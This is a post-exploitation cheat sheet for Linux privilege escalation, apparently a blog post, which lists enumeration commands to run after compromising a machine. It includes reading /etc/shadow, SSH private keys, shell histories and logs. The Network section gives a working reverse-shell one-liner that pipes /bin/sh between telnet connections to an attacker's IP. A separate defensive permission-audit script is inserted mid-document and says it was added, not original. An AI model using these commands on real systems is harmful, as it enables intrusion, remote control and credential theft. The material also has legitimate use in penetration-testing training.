Privilege escalation on GNU/Linux

Below is a small cheat sheet with the commands to run after successfully exploiting a GNU/Linux system.
Naturally it will keep growing as needs arise, but these are the basics for finding out everything from the machine's IP address to which user you actually are on it.
Once inside a machine, every piece of data we can reach may pose a security risk to the system and even to the network, so, as you know, the best way to defend is to know where you are going to be attacked.
  • Operating system
    • Distribution type and operating system
      shell> cat /etc/issue
      shell> cat /etc/*-release
      shell> cat /etc/lsb-release
      shell> cat /etc/redhat-release
      
    • Kernel version
      shell> cat /proc/version   
      shell> uname -a
      shell> uname -mrs 
      shell> rpm -q kernel 
      shell> dmesg | grep Linux
      shell> ls /boot | grep vmlinuz-
      
    • Environment variables
      shell> cat /etc/profile
      shell> cat /etc/bashrc
      shell> cat ~/.bash_profile
      shell> cat ~/.bashrc
      shell> cat ~/.bash_logout
      shell> env
      shell> set
      
  • Applications and services
    • Running services
      shell> ps aux
      shell> ps -ef
      shell> top
      shell> cat /etc/services
      
    • Services running as root
      shell> ps aux | grep root
      shell> ps -ef | grep root
      
    • Installed applications
      shell> ls -alh /usr/bin/
      shell> ls -alh /sbin/
      shell> dpkg -l
      shell> rpm -qa
      shell> ls -alh /var/cache/apt/archives
      shell> ls -alh /var/cache/yum/
      
    • Default configurations or (vulnerable) plugins
      shell> cat /etc/syslog.conf 
      shell> cat /etc/chttp.conf
      shell> cat /etc/lighttpd.conf
      shell> cat /etc/cups/cupsd.conf 
      shell> cat /etc/inetd.conf 
      shell> cat /etc/apache2/apache2.conf
      shell> cat /etc/my.cnf
      shell> cat /etc/httpd/conf/httpd.conf
      shell> cat /opt/lampp/etc/httpd.conf
      shell> ls -aRl /etc/ | awk '$1 ~ /^.*r.*/' 2>/dev/null
      
    • List of scheduled jobs
      shell> crontab -l
      shell> ls -alh /var/spool/cron
      shell> ls -al /etc/ | grep cron
      shell> ls -al /etc/cron*
      shell> cat /etc/cron*
      shell> cat /etc/at.allow
      shell> cat /etc/at.deny
      shell> cat /etc/cron.allow
      shell> cat /etc/cron.deny
      shell> cat /etc/crontab
      shell> cat /etc/anacrontab
      shell> cat /var/spool/cron/crontabs/root
      
  • Network
    • Network interfaces and configured connections
      shell> /sbin/ifconfig -a
      shell> cat /etc/network/interfaces
      shell> cat /etc/sysconfig/network 
      
    • Network configuration
      shell> cat /etc/resolv.conf
      shell> cat /etc/sysconfig/network
      shell> cat /etc/networks
      shell> iptables -L
      shell> hostname
      shell> dnsdomainname
      
    • Connections established with the machine
      shell> lsof -i 
      shell> lsof -i :80
      shell> grep 80 /etc/services
      shell> netstat -antup
      shell> netstat -antpx
      shell> netstat -tulpn
      shell> chkconfig --list
      shell> chkconfig --list | grep 3:on
      shell> last
      shell> w
      shell> arp -e
      shell> route
      shell> /sbin/route -nee
      
    • Is it possible to sniff the network?
      shell> tcpdump '(dst host 192.168.1.7 and tcp dst port 80) or (dst host 10.2.2.222 and tcp dst port 21)'
      
    • Starting a remote shell
      shell> nc -lvp 4444    # Attacker. Input (commands)
      shell> nc -lvp 4445    # Attacker. Output (results)
      shell> telnet [attacker's ip] 4444 | /bin/sh | telnet [attacker's ip] 4445
      
    • Port forwarding
      shell> ssh -L 8080:127.0.0.1:80 root@192.168.1.7
      shell> ssh -R 8080:127.0.0.1:80 root@192.168.1.7
      
  • User information
    • Who you are and which users exist
      shell> id
      shell> who
      shell> w
      shell> last 
      shell> cut -d: -f1 /etc/passwd    # List of users
      shell> grep -v -E "^#" /etc/passwd|awk -F: '$3 == 0 { print $1}'
      shell> awk -F: '($3 == "0") {print}' /etc/passwd
      shell> cat /etc/sudoers
      shell> sudo -l
      shell> cat ~/.bashrc
      shell> cat ~/.profile
      shell> cat /var/mail/root
      shell> cat /var/spool/mail/root
      
    • Access to sensitive files
      shell> cat /etc/passwd
      shell> cat /etc/group
      shell> cat /etc/shadow
      shell> ls -alh /var/mail/
      
    • Things "of interest" in the machine's home directories
      shell> ls -ahlR /root/
      shell> ls -ahlR /home/
      
    • Passwords, scripts, configurations, databases, etc.
      shell> cat /var/apache2/config.inc
      shell> cat /var/lib/mysql/mysql/user.MYD 
      shell> cat /root/anaconda-ks.cfg
      
    • Last commands executed
      shell> cat ~/.bash_history
      shell> cat ~/.nano_history
      shell> cat ~/.atftp_history
      shell> cat ~/.mysql_history 
      shell> cat ~/.php_history
      
    • SSH private and public keys
      shell> cat ~/.ssh/authorized_keys
      shell> cat ~/.ssh/identity.pub
      shell> cat ~/.ssh/identity
      shell> cat ~/.ssh/id_rsa.pub
      shell> cat ~/.ssh/id_rsa
      shell> cat ~/.ssh/id_dsa.pub
      shell> cat ~/.ssh/id_dsa
      shell> cat /etc/ssh/ssh_config
      shell> cat /etc/ssh/sshd_config
      shell> cat /etc/ssh/ssh_host_dsa_key.pub
      shell> cat /etc/ssh/ssh_host_dsa_key
      shell> cat /etc/ssh/ssh_host_rsa_key.pub
      shell> cat /etc/ssh/ssh_host_rsa_key
      shell> cat /etc/ssh/ssh_host_key.pub
      shell> cat /etc/ssh/ssh_host_key
      
  • Filesystem
    • Filesystem mounts
      shell> mount
      shell> df -h
      shell> cat /etc/fstab
      
    • Advanced permissions
      shell> find / -perm -1000 -type d 2>/dev/null
      shell> find / -perm -g=s -type f 2>/dev/null
      shell> find / -perm -u=s -type f 2>/dev/null
      shell> find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
      shell> for i in `locate -r "bin$"`
      do
         find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null;
      done
      
    • Which files in /etc can be edited
      shell> ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null
      shell> ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null        # owner-writable
      shell> ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null     # group-writable
      shell> ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null         # world-writable
      shell> find /etc/ -readable -type f 2>/dev/null
      shell> find /etc/ -maxdepth 1 -readable -type f 2>/dev/null
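The setuid/setgid search and the writable-file checks from the two sections above, packaged as reusable shell functions so the same checks can be run as a baseline audit of a host rather than typed one at a time. This is an added example and not part of the original post; the function names, the directory argument and the report layout are this example's own choices.

```sh
#!/bin/sh
# Added example, not from the original post: the setuid/setgid search and
# the "writable files in /etc" checks above, as reusable functions.
# Function names and the directory argument are this example's own choices.

# list_setid DIR: regular files under DIR with the setuid or setgid bit set
# (same predicate as the find loop above, without the locate dependency).
list_setid() {
    find "$1" \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null
}

# list_group_or_world_writable DIR: regular files under DIR that group or
# others may write. This is what the awk patterns over 'ls -aRl' above are
# looking for, expressed directly as find permission tests.
list_group_or_world_writable() {
    find "$1" \( -perm -0020 -o -perm -0002 \) -type f 2>/dev/null
}

# classify_mode MODE: take a ten-character 'ls -l' mode field such as
# -rwsr-xr-x and print, comma-separated, the attributes a reviewer cares
# about (setuid, setgid, sticky, group-writable, world-writable), or
# "none". Useful when all you have is captured 'ls -aRl' output.
classify_mode() {
    mode=$1
    found=""
    case "$mode" in ???[sS]??????) found="${found}setuid," ;; esac
    case "$mode" in ??????[sS]???) found="${found}setgid," ;; esac
    case "$mode" in ?????????[tT]) found="${found}sticky," ;; esac
    case "$mode" in ?????w????)    found="${found}group-writable," ;; esac
    case "$mode" in ????????w?)    found="${found}world-writable," ;; esac
    if [ -n "$found" ]; then
        printf '%s\n' "${found%,}"   # drop the trailing comma
    else
        printf 'none\n'
    fi
}

# annotate_ls: read 'ls -l' style lines on stdin and prefix each file,
# directory or symlink entry with its classification, for example
#   setuid  -rwsr-xr-x 1 root root 12345 Jan 1 00:00 passwd
# A trailing '.' or '+' (SELinux context / ACL marker) on the mode field is
# ignored. Lines that are not entries (totals, headers) pass through as-is.
annotate_ls() {
    while IFS= read -r line; do
        mode=${line%% *}
        mode=${mode%[.+]}
        case "$mode" in
            [-dl]?????????) printf '%s  %s\n' "$(classify_mode "$mode")" "$line" ;;
            *) printf '%s\n' "$line" ;;
        esac
    done
}

# audit_dir DIR: print a short report of both checks for DIR (default /etc).
audit_dir() {
    dir=${1:-/etc}
    echo "== setuid/setgid files under $dir =="
    list_setid "$dir"
    echo "== group- or world-writable files under $dir =="
    list_group_or_world_writable "$dir"
}

# Usage: sh audit_perms.sh /etc   (with no argument the functions are only
# defined, so the file can also be sourced from another script)
if [ $# -gt 0 ]; then
    audit_dir "$1"
fi
```

The find-based functions are the ones to run on a live host; `classify_mode` and `annotate_ls` exist for the case where a directory listing was captured earlier and has to be reviewed offline, which is the situation the awk one-liners above handle by hand.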
      
    • What can be pulled from /var
      shell> ls -alh /var/log
      shell> ls -alh /var/mail
      shell> ls -alh /var/spool
      shell> ls -alh /var/spool/lpd 
      shell> ls -alh /var/lib/pgsql
      shell> ls -alh /var/lib/mysql
      shell> cat /var/lib/dhcp3/dhclient.leases
      
    • Web server
      shell> ls -alhR /var/www/
      shell> ls -alhR /srv/www/htdocs/ 
      shell> ls -alhR /usr/local/www/apache22/data/
      shell> ls -alhR /opt/lampp/htdocs/ 
      shell> ls -alhR /var/www/html/
      
    • Things of interest in the log files
      shell> cat /etc/httpd/logs/access_log
      shell> cat /etc/httpd/logs/access.log
      shell> cat /etc/httpd/logs/error_log
      shell> cat /etc/httpd/logs/error.log
      shell> cat /var/log/apache2/access_log
      shell> cat /var/log/apache2/access.log
      shell> cat /var/log/apache2/error_log
      shell> cat /var/log/apache2/error.log
      shell> cat /var/log/apache/access_log
      shell> cat /var/log/apache/access.log
      shell> cat /var/log/auth.log
      shell> cat /var/log/chttp.log
      shell> cat /var/log/cups/error_log
      shell> cat /var/log/dpkg.log
      shell> cat /var/log/faillog
      shell> cat /var/log/httpd/access_log
      shell> cat /var/log/httpd/access.log
      shell> cat /var/log/httpd/error_log
      shell> cat /var/log/httpd/error.log
      shell> cat /var/log/lastlog
      shell> cat /var/log/lighttpd/access.log
      shell> cat /var/log/lighttpd/error.log
      shell> cat /var/log/lighttpd/lighttpd.access.log
      shell> cat /var/log/lighttpd/lighttpd.error.log
      shell> cat /var/log/messages
      shell> cat /var/log/secure
      shell> cat /var/log/syslog
      shell> cat /var/log/wtmp
      shell> cat /var/log/xferlog
      shell> cat /var/log/yum.log
      shell> cat /var/run/utmp
      shell> cat /var/webmin/miniserv.log
      shell> cat /var/www/logs/access_log
      shell> cat /var/www/logs/access.log
      shell> ls -alh /var/lib/dhcp3/
      shell> ls -alh /var/log/postgresql/
      shell> ls -alh /var/log/proftpd/
      shell> ls -alh /var/log/samba/
      

